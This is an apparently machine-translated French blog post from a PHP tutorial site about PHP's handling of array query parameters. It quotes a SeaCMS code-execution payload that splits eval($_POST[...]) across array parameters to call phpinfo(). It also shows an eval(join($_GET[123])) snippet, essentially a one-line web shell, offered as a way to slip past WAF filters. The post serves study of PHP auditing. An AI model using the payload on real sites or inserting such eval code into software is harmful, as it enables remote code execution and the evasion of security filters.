Exemple de partage de la façon dont PHP envoie un tableau via une requête http

黄舟
Libérer: 2023-03-16 18:40:01
original
2295 Les gens l'ont consulté

J'ai récemment commencé à apprendre l'audit PHP, et juste à temps pour étudier les seacms, j'ai découvert un point étrange dans la charge utile

searchtype=5&searchword={
if{searchpage:year}&year=:e{searchpage:area}
}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
Copier après la connexion

Je l'ai essayé et j'ai découvert cela lors de la réception de données, par exemple :

Nom de la clé=a, puis en passant a[]=a&a[]=b, a est un tableau, donc nous avons fait un test, et c'était vrai

Test côté serveur code

<?php
	print_r($_GET[1]);
?>
Copier après la connexion

Les résultats du test sont les suivants

Exemple de partage de la façon dont PHP envoie un tableau via une requête http

Exemple de partage de la façon dont PHP envoie un tableau via une requête http

Alors à quoi ça sert un? Après réflexion, s'il y a des outils de protection tels que security dog ​​ou waf sur le serveur, alors en les combinant avec d'autres fonctions PHP, comme la fonction join, l'effet de contournement peut être obtenu

Fournir un idée simple

Code de test du serveur

<?php
	eval(join($_GET[123]));
?>
Copier après la connexion

Les résultats du test sont les suivants

Exemple de partage de la façon dont PHP envoie un tableau via une requête http

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
source:php.cn
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal
À propos de nous Clause de non-responsabilité Sitemap
Site Web PHP chinois:Formation PHP en ligne sur le bien-être public,Aidez les apprenants PHP à grandir rapidement!